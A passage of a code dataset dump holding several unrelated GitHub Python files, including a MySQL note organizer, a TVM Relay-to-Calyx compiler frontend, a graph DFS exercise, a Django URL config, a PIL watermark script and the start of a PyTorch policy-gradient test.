user=db_root_user, password=db_root_pass)\n cursor = cnx.cursor()\n\n def connect_to_db(self, db_name):\n try:\n print(f'Connecting to database: ', end='')\n self.cursor.execute(f'USE {db_name}_organizer;')\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n print(f'DB {db_name}_organizer does not exist')\n try:\n print(f'Creating database {db_name}_organizer: ', end='')\n self.cursor.execute(f'CREATE DATABASE {db_name}_organizer;')\n self.cursor.execute(f'USE {db_name}_organizer;')\n except mysql.connector.Error as err:\n print(f'failed creating database, {err}')\n exit(1)\n else:\n print('created and connected')\n else:\n print('done')\n\n def create_tables(self):\n tables = {}\n\n tables['note'] = 'CREATE TABLE note(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'title nvarchar(100) not null,' \\\n 'content nvarchar(8000) not null' \\\n ');'\n\n tables['business_card'] = 'CREATE TABLE business_card(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'name varchar(45),' \\\n 'surname nvarchar(45),' \\\n 'mobile char(9) not null' \\\n ');'\n\n tables['discount_code'] = 'CREATE TABLE discount_code(' \\\n 'id int(11) PRIMARY KEY auto_increment,' \\\n 'date date not null,' \\\n 'priority int(11),' \\\n 'shop varchar(45) not null,' \\\n 'discount varchar(11) not null,' \\\n 'code varchar(30) not null' \\\n ');'\n\n for table in tables:\n table_desc = tables[table]\n try:\n print(f'Creating table {table}: ', end='')\n self.cursor.execute(table_desc)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print('already exists')\n else:\n print(err.msg)\n else:\n print('done')\n print('')\n\n def insert_note_into_db(self, new_note):\n insert_query = 'INSERT INTO note (date, priority, title, content) ' \\\n 'VALUES (%(date)s, %(priority)s, %(title)s, %(content)s);'\n self.cursor.execute(insert_query, new_note)\n self.cnx.commit()\n\n def extract_note_from_db(self):\n select_query = 'SELECT * FROM note;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_note_from_db(self, to_be_deleted):\n delete_query = 'DELETE FROM note WHERE id = %s;'\n self.cursor.execute(delete_query, to_be_deleted)\n self.cnx.commit()\n\n\n def inser_business_card_into_db(self, data):\n insert_query = 'INSERT INTO business_card (date, priority, name, surname, mobile) ' \\\n 'VALUES (%s, %s, %s, %s, %s);'\n self.cursor.execute(insert_query, data)\n self.cnx.commit()\n\n def extract_business_card_from_db(self):\n select_query = 'SELECT * FROM business_card;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_business_card_from_db(self, id):\n delete_query = 'DELETE FROM business_card WHERE id = %s;'\n self.cursor.execute(delete_query, id)\n self.cnx.commit()\n\n\n def insert_discount_code_into_db(self, data):\n insert_query = 'INSERT INTO discount_code (date, priority, shop, discount, code) ' \\\n 'VALUES (%s, %s, %s, %s, %s);'\n self.cursor.execute(insert_query, data)\n self.cnx.commit()\n\n def extract_discount_code_from_db(self):\n select_query = 'SELECT * FROM discount_code;'\n self.cursor.execute(select_query)\n return self.cursor\n\n def delete_discount_code_from_db(self, id):\n delete_query = 'DELETE FROM discount_code WHERE id = %s;'\n self.cursor.execute(delete_query, id)","repo_name":"ziepio/organizer","sub_path":"db_mysql.py","file_name":"db_mysql.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18130073647","text":"#!/usr/bin/env python3\n# type: ignore\nfrom typing import Tuple\n\nimport numpy as np\nimport tvm\nfrom tvm import relay\nfrom tvm.relay.expr_functor import ExprFunctor\nfrom tvm.relay.function import Function\n\n\nfrom collections import defaultdict\nfrom typing import List, Dict\n\nimport relay_utils as ru\nfrom calyx.py_ast import (\n Cell,\n CompVar,\n CompInst,\n Import,\n Program,\n SeqComp,\n Stdlib,\n Component,\n)\nfrom calyx.utils import float_to_fixed_point\nfrom fud.stages.verilator import numeric_types\nfrom dahlia_impl import emit_components\n\ncalyx_keywords_list = [\"input\"]\n\n\ndef rename_relay_var(name: str) -> str:\n \"\"\"\n Function to rename relay variable names (that are illegal in Calyx) into legal\n ones. This function is to ensure a consistent standard for renaming, since\n we want to make sure that the cell names in the external memory json match the\n name they are instantiated as in the Calyx file\n \"\"\"\n new_name = name.replace(\".\", \"_\")\n new_name = new_name.replace(\"/\", \"_\")\n\n if new_name.isdigit():\n new_name = \"var_\" + new_name\n if new_name in calyx_keywords_list:\n new_name = \"_\" + new_name\n\n return new_name\n\n\nclass Relay2Calyx(ExprFunctor):\n \"\"\"The main compilation visitor.\"\"\"\n\n def __init__(self):\n super(Relay2Calyx, self).__init__()\n self.id_dictionary = defaultdict(int)\n self.function_id_dictionary = defaultdict(int)\n\n # A dictionary of currently visited variable nodes,\n # since some nodes may be visited more than once.\n self.id_to_cell: Dict[str, Cell] = {}\n\n # A dictionary of variable names to dimensionality.\n # This used for the data in Calyx simulation.\n self.id_to_shape: Dict[str, Tuple] = {}\n\n # maps the operator name/ destination memory width to the\n # dahlia function. Used to detect when two dahlia functions are\n # the same so we don't declare it twice\n self.func_def_map = {}\n\n # For each Relay CallNode, there is an associated\n # Dahlia FuncDef so that it can be lowered from Dahlia\n # to Calyx as a stand-alone component.\n self.func_defs: List[ru.DahliaFuncDef] = []\n\n # Controls, wires of the main component.\n self.controls = []\n self.wires = []\n\n self.pos_count = 0\n\n self.source_map: Dict[str, str] = {}\n\n # for let stmts such as `let %x13: (_,_) = (%x9, %x12)\n # if %x9 is equal to some memory mem9, and %x12 is equal to some memory mem12\n # this maps the var %x13 -> [mem9, mem12]\n self.tuple_dic = {}\n\n # for let stmts such as `let %x_10 = meta[relay.Constant][0]`,\n # which is a multidimensional value, we need a dic to remember such\n # statements so that we can put it in the data json file\n self.mem_data = {}\n\n def id(self, name):\n \"\"\"\n Provides a unique identification for a given name.\n If 'a' is seen twice, it will produce: 'a', 'a1'.\n No `_` is used, in accordance with Relay variable\n names.\n \"\"\"\n id_number = self.id_dictionary[name]\n self.id_dictionary[name] += 1\n return f\"{name}{'' if id_number == 0 else id_number}\"\n\n def func_id(self, function_name):\n \"\"\"Used to uniquely identify functions with the\n same name and arity. Eventually, we'll want to\n instantiante two instances of the same Calyx\n component. For example, if `foo_3x3` is seen twice,\n it will produce: `foo_3x3`, `foo_3x3_1`\"\"\"\n id_number = self.id_dictionary[function_name]\n self.id_dictionary[function_name] += 1\n return function_name if id_number == 0 else f\"{function_name}_{id_number}\"\n\n def visit_var(self, var) -> list:\n \"\"\"\n Visits a Relay variable and returns the\n corresponding Calyx memory/memories.\n \"\"\"\n if var in self.tuple_dic.keys():\n return self.tuple_dic[var]\n if isinstance(var.type_annotation, tvm.ir.type.TupleType):\n # returns a list of names instead\n assert 0, \"should have been added to tuple_dic when defined in a let stmt\"\n\n var_id = self.id(rename_relay_var(var.name_hint))\n cell = ru.get_memory(var_id, var.type_annotation)\n if var.type_annotation.concrete_shape:\n # Only add the given variable if it is a tensor.\n self.id_to_shape[var_id] = var.type_annotation.concrete_shape\n self.id_to_cell[var_id] = cell\n return [cell]\n\n def equivalent_func(self, args1, args2, atts1, atts2):\n \"\"\"\n Assuming functions 1 and 2 have equivalent destination widths (ex: 1x64x55x55) and\n operator name (ex: \"Conv2d\"), this function checks if the functions have\n equivalent args and attributes. This is mainly making sure the attributes (so for\n conv2d, things like `padding` or `kernel_size`) and memory sizes of the args\n are the same.\n \"\"\"\n atts_are_same = True\n if (atts1 is None) != (atts2 is None):\n atts_are_same = False\n if (atts1 is not None) and (atts2 is not None):\n for key in atts1.keys():\n attr1 = atts1.get_str(key)\n attr2 = atts2.get_str(key)\n # even if the contents of tvm.ir.container.Array are the same it\n # still doesn't return true on '=='\n if isinstance(attr1, tvm.ir.container.Array) and isinstance(\n attr2, tvm.ir.container.Array\n ):\n attr1 = list(attr1)\n attr2 = list(attr2)\n if not attr1 == attr2:\n atts_are_same = False\n args_are_same = True\n for arg1, arg2 in zip(args1, args2):\n if arg1.comp != arg2.comp:\n args_are_same = False\n return atts_are_same and args_are_same\n\n def analyze_val_dest(self, let, value, dest, type_annotation):\n \"\"\"\n Helper method that is ussed to handle certain cases for visiting\n let statements. Should only call when value is a Constant or a Call\n \"\"\"\n if isinstance(value, tvm.relay.Constant):\n # In the updated version of TVM, sometimes there are assignments\n # in the form of `let %x_10 = meta[relay.Constant][0]`\n # We need to handle remember this data in a dictionary since Calyx\n # will get these values externally in a json file\n for dim_val in value.data.shape:\n if dim_val != 1:\n np_data = value.data.numpy()\n self.mem_data[dest.id.name] = np_data\n return\n\n # Generates a constant primitive.\n # This is done here since we need\n # both the variable id and the value.\n width = ru.get_bitwidth(value.data)\n\n if \"float\" in value.data.dtype:\n # Convert to fixed point.\n constant = float_to_fixed_point(value.data.numpy(), width // 2)\n val = numeric_types.FixedPoint(\n f\"{constant}\", width, width // 2, True\n ).unsigned_integer()\n else:\n val = value.data\n cell = Cell(CompVar(dest.id.name), Stdlib.constant(width, val))\n self.id_to_cell[dest.id.name] = cell\n elif isinstance(value, tvm.relay.Call):\n # Generates cells and control for a Relay Call:\n # 1. `Invoke` control\n # 2. Component declaration for the invoked component.\n # 3. `DahliaFuncDef` to generate the Relay call component.\n\n func_name = value.op.name\n # Function names may have a Relay\n # namespace prepended, e.g. `nn.bias_add`.\n # We want to remove these.\n prefix = func_name.find(\".\")\n if prefix is not None:\n func_name = func_name[prefix + 1 :]\n\n # Append arity to Calyx component name.\n dims = \"x\".join([str(i) for i in ru.get_dimension_sizes(dest.comp)])\n\n unnested_args = []\n for arg in value.args:\n new_arg = arg\n if isinstance(arg, list):\n assert (\n len(arg) == 1\n ), \"only time arg can be a list is when it returns a list of length 1 from visit_var()\"\n new_arg = arg[0]\n unnested_args.append(new_arg)\n value.args = unnested_args\n\n root_name = f\"{func_name}_{dims}\"\n\n is_repeat_func = False\n\n # If we want to \"reuse\" a Dahlia function so that we're only generating\n # one Calyx component, when we create the invoke we have\n # to make sure that we use the old names for the parameters\n # (by old names, I mean the names that the previous component used\n # for its ref cell parameters)\n # all of this old_func_args and old_dest stuff will be useful when\n # considering which arguments should be passed into the DahliaFunc/Calyx Invoke\n # statement\n old_func_args = []\n old_dest = None\n if root_name in self.func_def_map:\n for dahlia_func in self.func_def_map[root_name]:\n if self.equivalent_func(\n dahlia_func.args,\n value.args,\n dahlia_func.attributes,\n value.attrs,\n ):\n # this means we can \"reuse\" the Dahlia Function which\n # will later be turned into a Calyx component, since\n # we have already created a Dahlia function idential\n # to the one we were about to create\n comp_name = f\"{dahlia_func.component_name}\"\n comp_inst = dahlia_func.component\n old_func_args = dahlia_func.args\n old_dest = dahlia_func.dest\n is_repeat_func = True\n break\n\n # Given functions with the same operator and arity,\n # append a unique identifier to the preceding. However, we only want\n # to create a new Dahlia Function (which will be lowered\n # to a Calyx component) if we havnen't encountered the same function\n # before\n if not is_repeat_func:\n comp_name = self.func_id(f\"{func_name}_{dims}\")\n comp_inst = CompInst(comp_name, [])\n\n # call self.id on comp_name because now we might produce two instances\n # of the same component\n var_name = self.id(f\"{comp_name}_\")\n comp_decl = CompVar(f\"{var_name}\")\n\n self.id_to_cell[var_name] = Cell(comp_decl, comp_inst)\n\n # the parameters old_func_args and old_dest are what determines whether\n # ru.emit_invoke_control emits a \"new\" invoke or an invoke of an already defined\n # Calyx component/Dahlia function\n invoke = ru.emit_invoke_control(\n comp_decl, dest, value.args, old_args=old_func_args, old_dest=old_dest\n )\n invoke.attributes.append((\"pos\", self.pos_count))\n self.controls.append(invoke)\n\n tag = self.pos_count\n self.pos_count += 1\n\n self.source_map[tag] = [\n x for x in str(let).splitlines() if x.startswith(\"let\")\n ][0]\n\n # only add to Dahlia Functions list and map if we are actually want to\n # use a new Dahlia Function, i.e., if we are not reusing the function\n if not is_repeat_func:\n dahlia_func_def = ru.DahliaFuncDef(\n function_id=func_name,\n component_name=comp_name,\n dest=dest,\n args=value.args,\n attributes=value.attrs,\n data_type=ru.get_dahlia_data_type(type_annotation),\n component=comp_inst,\n )\n self.func_defs.append(dahlia_func_def)\n if root_name in self.func_def_map:\n self.func_def_map[root_name].append(dahlia_func_def)\n else:\n self.func_def_map[root_name] = [dahlia_func_def]\n\n else:\n assert 0, f\"{value} is not supported yet.\"\n\n def visit_let(self, let):\n \"\"\"Visits a `let` statement in the following manner:\n 1. Visit the `value`.\n 2. Visit the `var`, or destination.\n 3. Return the `body`.\n \"\"\"\n # Check if the dest is a tuple\n if isinstance(let.var.type_annotation, tvm.ir.type.TupleType):\n value = self.visit(let.value)\n # Handles cases such as: `%x13 = (%x9, %x12)`. where %x9 and %x12 will\n # evaluate to cells\n assert isinstance(value, list) and len(value) == len(\n let.var.type_annotation.fields\n ), \"Currently, if let destination is a tuple, can only handle 'tuple forwarding' situations\"\n unnested_values = []\n # need to do this bc visit_var now returns a list\n for dest in value:\n assert isinstance(dest, list) and isinstance(\n dest[0], Cell\n ), \"Tuples in let value must evaluate to cells\"\n unnested_values.append(dest[0])\n # doesn't do anything just increments id by 1 so that we can\n # compare the names the generated Calyx/Dahlia files with the\n # TVM relay more easily.\n self.id(let.var.name_hint)\n # don't need to create new cells, just map the var to the cells in value\n self.tuple_dic[let.var] = unnested_values\n else:\n value = self.visit(let.value)\n dest = self.visit(let.var)\n # need to pass dest[0] bc visit_var returns a list\n self.analyze_val_dest(let, value, dest[0], let.var.type_annotation)\n return self.visit(let.body)\n\n def visit_tuple(self, tup) -> list:\n \"\"\"\n For visiting tuple. Just recursively visits each element in the tuple.\n \"\"\"\n return [self.visit(x) for x in tup.fields]\n\n def visit_constant(self, const) -> tvm.relay.Constant:\n \"\"\"Simply returns the Relay constant. Since we don't\n have the variable id here, we generate the Calyx\n cell within the `let` visit.\"\"\"\n return const\n\n def visit_call(self, call) -> tvm.relay.Call:\n \"\"\"The Relay call consists of 3 main pieces:\n call.op, call.args, and call.attrs. The\n latter two are used within call.op.\n\n call.op is mapped to a corresponding Dahlia function,\n and subsequently lowered to Calyx as a component to\n be invoked.\n \"\"\"\n # Visit the call arguments.\n call.args = [self.visit(a) for a in call.args]\n # dealing w/ the fact that visit_var returns list\n call.args = flatten_lst(call.args)\n return call\n\n def visit_function(self, function):\n \"\"\"Visits the function. Returns the `main`\n component, as well as a list of Dahlia\n function definitions.\"\"\"\n for p in function.params:\n self.visit(p)\n\n self.visit(function.body)\n\n return (\n Component(\n name=\"main\",\n inputs=[],\n outputs=[],\n structs=self.wires + list(self.id_to_cell.values()),\n controls=SeqComp(self.controls),\n ),\n self.func_defs,\n )\n\n\ndef flatten_lst(lst):\n \"\"\"\n Because evaluating a variable sometimes returns a tuple, the return type of\n visit_var() is a list. So when we evaluate a list of variables, we get a\n list of lists back. This function will return a flattened version of\n its input list.\n Precondition: the only elements in lst should be cells and/or lists of\n cells\n \"\"\"\n flat = []\n for elt in lst:\n if isinstance(elt, Cell):\n flat.append(elt)\n elif isinstance(elt, list):\n for sub_elt in elt:\n flat.append(sub_elt)\n else:\n assert 0, \"Args must evaluate to a Cell\"\n return flat\n\n\ndef relay_transforms(mod) -> Function:\n \"\"\"https://tvm.apache.org/docs/api/python/relay/transform.html\"\"\"\n transforms = tvm.transform.Sequential(\n [\n relay.transform.SimplifyExpr(),\n relay.transform.SimplifyInference(),\n ]\n )\n if isinstance(mod, relay.Function):\n mod = tvm.IRModule.from_expr(mod)\n mod = transforms(mod)\n\n return mod[\"main\"]\n\n\ndef check_naming_convention(func_defs: List[ru.DahliaFuncDef]):\n \"\"\"Names that begin with the prefix `__` are reserved for\n the Dahlia programs that are created to implement the\n respective Relay call nodes. For example, `__x` is\n not allowed, but `_x` and `x` are OK.\n \"\"\"\n\n def is_reserved(x):\n return x[:2] == \"__\"\n\n for f in func_defs:\n variables = [v.id.name for v in f.args + [f.dest]]\n reserved_variables = list(filter(is_reserved, variables))\n if reserved_variables:\n raise Exception(\n f\"Relay call node: `{f.function_id}` violates the naming convention. No \"\n \"variables should be prefixed with `__`. This is reserved for Dahlia \"\n \"local variables used before lowering to Calyx. Offending variable name(s): \"\n f\"{', '.join(reserved_variables)}\"\n )\n\n\ndef emit_calyx(relay_ir, save_mem=True) -> (str, Program):\n \"\"\"Lowers a Relay function to a Calyx program.\"\"\"\n relay_ir = relay_transforms(relay_ir)\n visitor = Relay2Calyx()\n main, func_defs = visitor.visit(relay_ir)\n check_naming_convention(func_defs)\n\n return (\n emit_components(func_defs, save_mem),\n Program(\n imports=[\n # Manually printed because we need to print the Dahlia\n # function definitions\n ],\n components=[main],\n meta=visitor.source_map,\n ),\n )\n\n\ndef get_program_dat_memories(relay_ir):\n \"\"\"Returns a mapping (id -> tensor size)\n for each memory in the Relay IR. The format\n explicitly follows the `dat` format; this\n is used for Calyx simulation.\"\"\"\n visitor = Relay2Calyx()\n relay_ir = relay_transforms(relay_ir)\n _, func_defs = visitor.visit(relay_ir)\n\n memories = {}\n for id, shape in visitor.id_to_shape.items():\n if id in visitor.mem_data.keys():\n memories[id] = {\n \"data\": visitor.mem_data[id].tolist(),\n \"format\": {\n \"numeric_type\": \"fixed_point\",\n \"is_signed\": True,\n \"width\": 32,\n \"frac_width\": 16,\n },\n }\n else:\n memories[id] = {\n \"data\": np.zeros(shape).tolist(),\n \"format\": {\n \"numeric_type\": \"fixed_point\",\n \"is_signed\": True,\n \"width\": 32,\n \"frac_width\": 16,\n },\n }\n\n return memories\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Lower Relay IR to Calyx.\")\n parser.add_argument(\"file\", help=\"Path to the Relay IR.\")\n parser.add_argument(\n \"-s\",\n \"--save_mem\",\n required=False,\n help=\"boolean to determine whether you the Calyx design to use less memory\",\n )\n\n args = parser.parse_args()\n if args.file is None:\n raise Exception(\n \"The TVM Relay visitor requires a file containing the Relay IR.\"\n )\n\n with open(args.file, \"r\") as file:\n relay_ir = file.read()\n assert (\n '#[version = \"0.0.5\"]' in relay_ir\n ), 'TVM Requires #[version = \"0.0.5\"] at the top of the Relay IR file.'\n\n relay_ir = tvm.parser.fromtext(relay_ir)\n\n imports = [\n Import(\"primitives/core.futil\"),\n Import(\"primitives/memories.futil\"),\n Import(\"primitives/binary_operators.futil\"),\n Import(\"primitives/math.futil\"),\n ]\n\n # save_mem is an optional argument. If user doesn't specify, we\n # want default to be save_mem = true\n save_mem = (\n args.save_mem == \"true\" or args.save_mem == \"True\" or args.save_mem is None\n )\n\n (dahlia_defs, prog) = emit_calyx(relay_ir, save_mem)\n for imp in imports:\n print(imp.doc())\n print(dahlia_defs)\n print(prog.doc())\n","repo_name":"cucapra/calyx","sub_path":"frontends/relay/relay_visitor.py","file_name":"relay_visitor.py","file_ext":"py","file_size_in_byte":20696,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"17088807015","text":"#User function Template for python3\n\nclass Solution:\n \n #Function to return a list containing the DFS traversal of the graph.\n def dfsOfGraph(self, V, graph):\n def dfs(node):\n nonlocal visited, ans\n ans.append(node)\n \n for nei in graph[node]:\n if nei not in visited:\n visited.add(nei)\n dfs(nei)\n \n # print(graph)\n ans = []\n visited = set()\n visited.add(0)\n dfs(0)\n return ans\n\n\n#{ \n # Driver Code Starts\nif __name__ == '__main__':\n T=int(input())\n while T>0:\n V,E=map(int,input().split())\n adj=[[] for i in range(V+1)]\n for i in range(E):\n u,v=map(int,input().split())\n adj[u].append(v)\n adj[v].append(u)\n ob=Solution()\n ans=ob.dfsOfGraph(V,adj)\n for i in range(len(ans)):\n print(ans[i],end=\" \")\n print()\n T-=1\n# } Driver Code Ends","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"DFS of Graph - GFG/dfs-of-graph.py","file_name":"dfs-of-graph.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2636553279","text":"import numpy as np\nfrom game.constants import *\n\n\nclass Grid:\n\n INT_MAX = 10000\n\n def __init__(self):\n\n self.desc = \"This object is used to do math with vectors.\"\n\n self.width = SCREEN_WIDTH // TILESIZE\n self.height = SCREEN_HEIGHT // TILESIZE\n self.depth = 2*self.height # using y as z\n #layer v2 [y overlap][x screen][y screen]\n self.layers = np.empty((self.width, self.height,\n self.depth, 2),\n np.float32)\n self.layers[:] = np.nan\n\n def poly_check(self, points, p):\n\n ax, ay, bx, by, cx, cy, dx, dy = points[0][0], points[0][1], \\\n points[1][0], points[1][1], \\\n points[2][0], points[2][1], \\\n points[3][0], points[3][1]\n px, py = p[0], p[1]\n nx = bx - ax\n ny = by - ay\n edge = (px - ax) * ny + (py - ay) * (-nx)\n if (edge > 240):\n return False\n else:\n nx = cx - bx\n ny = cy - by\n edge = (px - bx) * ny + (py - by) * (-nx)\n\n if (edge > 240):\n return False\n else:\n nx = dx - cx\n ny = dy - cy\n edge = (px - cx) * ny + (py - cy) * (-nx)\n\n if (edge > 240):\n return False\n else:\n nx = ax - dx\n ny = ay - dy\n edge = (px - dx) * ny + (py - dy) * (-nx)\n\n if (edge > 240):\n return False\n else:\n return True\n\n def twodimensionalsum(self, p1, p2):\n \"\"\"given (a,b) and (c,d) return (a+c, b+d)\"\"\"\n return (p1[0] + p2[0], p1[1] + p2[1])\n\n def round_num(self, number, roundby=None):\n \"\"\"if roundby is none default to TILESIZE constant\"\"\"\n if not roundby:\n return TILESIZE * (number // TILESIZE)\n else:\n return roundby * (number // roundby)\n\n def rounder(self, number, roundby=None):\n \"\"\"same as round_num but no scalar if rounder is none default to TILESIZE constant\"\"\"\n if not roundby:\n return (number // TILESIZE)\n else:\n return (number // roundby)\n\n def is_nan(self, tilex, tiley, tilez = None):\n \"\"\"check if self.layers has any nan values starting at bone layer\"\"\"\n if tilez is None:\n if np.isnan(self.layers[tilex][tiley][tiley][0]):\n return True\n else:\n if np.isnan(self.layers[tilex][tiley][tilez][0]):\n return True\n\n return False\n def curr_tile(self, tilex, tiley, adj = \"none\"):\n \"\"\"return the current tile at tilex, tiley using curr overlap (bone\n behind screen)\"\"\"\n depth_counter = 0\n for i in range(tiley + 1, self.depth):\n if not np.isnan(self.layers[tilex][tiley][i][0]):\n depth_counter += 1\n\n return depth_counter","repo_name":"Shubin123/tile-editor","sub_path":"game/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31791031446","text":"import logging\r\n\r\n# Function to iterate through the list and check ages \r\ndef validate_age_data(ages):\r\n for value in ages:\r\n if value <= 0: \r\n logger.error('Invalid age')\r\n elif value < 18:\r\n logger.debug('teenager')\r\n else: \r\n logger.debug('adult')\r\n\r\n\r\nif __name__ == '__main__':\r\n # Defining the structure of error message\r\n error_message_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\r\n \r\n # Setting up the basic configuration\r\n logging.basicConfig(filename = 'age_log.log', format = error_message_format, filemode = 'a')\r\n \r\n # Defining the logger object\r\n # Name can be given a logger object by passing as an argument, otherwise it takes the name as root\r\n logger = logging.getLogger('upGrad')\r\n \r\n # Set the level(Here we will set the level to DEBUG(10))\r\n # so that it can log itself and all other levels(INFO(20), WARNING(30) etc)\r\n logger.setLevel(logging.DEBUG)\r\n\r\n # Example_1:\r\n ages = [12, 22, 33, -6, 0, 15]\r\n validate_age_data(ages)\r\n \r\n # Example_2:\r\n ages = [12, 32, -55, 11, 61, 33]\r\n validate_age_data(ages)\r\n","repo_name":"sreegithub19/upgrad","sub_path":"2_Course_continuation/_4_MLOps/_3_Session_4_Solutions/Q.2 Logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7357815408","text":"from PIL import Image, ImageChops, ImageDraw, ImageFont\nimg = Image.open('img/1.jpg')\n# 切换图片模式\nimg = img.convert('RGBA')\n# 创建一个背景完全透明的图片模板,大小和原始图片一样大\n\nw, h = img.size\n\nnew_img = Image.new('RGBA', (w, h), (0, 0, 0, 0))\n\n# 使用ImageDraw生成一个画笔\n# 此过程需要用户提前指定需要操作的图片\n\ndraw_1 = ImageDraw.Draw(new_img)\n# 绘制文字\n# 使用imageFont生成对应的字体\nfont = ImageFont.truetype('img/111.ttf', 50)\n\ndraw_1.text((100, 300), '啦啦啦啦啦', font=font, fill=(100, 101, 100))\n\nnew_img = new_img.rotate(45)\n# 设置new_img向左下角移动\nnew_img = ImageChops.offset(new_img, -30, 30)\n# new_img.show()\n# 将文字和图片进行合并\ncombine_img = Image.alpha_composite(img, new_img)\ncombine_img.show()\n# 图片保存\ncombine_img = combine_img.convert('RGB')\ncombine_img.save('kkk.jpg')\n\n","repo_name":"yunyusha/xunxibiji","sub_path":"month1/week2/class5/pillow5.py","file_name":"pillow5.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21312362471","text":"#!/usr/bin/python3\n\n\ndef only_diff_elements(set_1, set_2):\n\n \"\"\"\n returns all elements present in only one set\n \"\"\"\n\n one_set = set()\n for element in set_1:\n if element not in set_2:\n one_set.add(element)\n for element in set_2:\n if element not in set_1:\n one_set.add(element)\n return one_set\n","repo_name":"Lesuuda/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/4-only_diff_elements.py","file_name":"4-only_diff_elements.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3276342807","text":"#!/usr/bin/env python\n\nfrom google.appengine.ext import ndb\n\nfrom lib.utils import BaseModel\nimport jsonschema\n\n\nclass TodoList(BaseModel):\n def validate_items(prop, value):\n if value is not None:\n schema = {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"completed\": {\"type\": \"boolean\"},\n \"description\": {\"type\": \"string\"}\n }\n }\n }\n jsonschema.validate(value, schema)\n\n name = ndb.StringProperty(required=True, indexed=False)\n items = ndb.JsonProperty(indexed=False, validator=validate_items)\n users = ndb.KeyProperty(kind='User', repeated=True)\n","repo_name":"jmuia/todo-plus-friends-service","sub_path":"model/todo_list.py","file_name":"todo_list.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2506134097","text":"c = input(''); a = input(''); b = input('')\r\ni = 0\r\nwhile a in c:\r\n if a in b:\r\n print('Impossible')\r\n break\r\n else:\r\n c = c.replace(a, b)\r\n i += 1\r\nelse: print(i)\r\n\r\n","repo_name":"vasyanch/stepik","sub_path":"Python_base_apply/Stepic_3mod_changestrings.py","file_name":"Stepic_3mod_changestrings.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11039852438","text":"from django.urls import path\nfrom customer.api_views import CreateUserView, CreateCustomerProfileView,\\\n CustomerProfileUpdateDetailٰView\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\napp_name = 'customer_api'\nurlpatterns = [\n path('login/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('register/',\n CreateUserView.as_view(), name='register'),\n path('profile/',\n CreateCustomerProfileView.as_view(), name='create_profile'),\n path('profile_customer/',\n CustomerProfileUpdateDetailٰView.as_view(), name='profile'),\n\n]\n","repo_name":"AliArefi1993/My-shop-Django","sub_path":"myshop/customer/api_urls.py","file_name":"api_urls.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379865707","text":"import itertools\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport numpy as np\nimport torch\n\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import exploitability\nfrom open_spiel.python.examples import kuhn_policy_gradient\nimport pyspiel\nfrom open_spiel.python.pytorch import policy_gradient\nfrom open_spiel.python.pytorch.losses import rl_losses\n\nSEED = 24984617\n\n\nclass PolicyGradientTest(parameterized.TestCase, absltest.TestCase):\n\n @parameterized.parameters(\n itertools.product((\"rpg\", \"qpg\", \"rm\", \"a2c\", \"neurd\"),\n (\"kuhn_poker\", \"leduc_poker\")))\n def test_run_game(self, loss_str, game_name):\n env = rl_environment.Environment(game_name)\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n num_actions=num_actions,\n loss_str=loss_str,\n hidden_layers_sizes=[32, 32],\n batch_size=16,\n entropy_cost=0.001,\n critic_learning_rate=0.01,\n pi_learning_rate=0.01,\n num_critic_before_pi=4) for player_id in [0, 1]\n ]\n\n for _ in range(2):\n time_step = env.reset()\n while not time_step.last():\n current_player = time_step.observations[\"current_player\"]\n current_agent = agents[current_player]\n agent_output = current_agent.step(time_step)\n time_step = env.step([agent_output.action])\n\n for agent in agents:\n agent.step(time_step)\n\n def test_neurd_kuhn(self):\n env = rl_environment.Environment(\"kuhn_poker\")\n env.seed(SEED)\n info_state_size = env.observation_spec()[\"info_state\"][0]\n num_actions = env.action_spec()[\"num_actions\"]\n\n agents = [\n policy_gradient.PolicyGradient( # pylint: disable=g-complex-comprehension\n player_id=player_id,\n info_state_size=info_state_size,\n 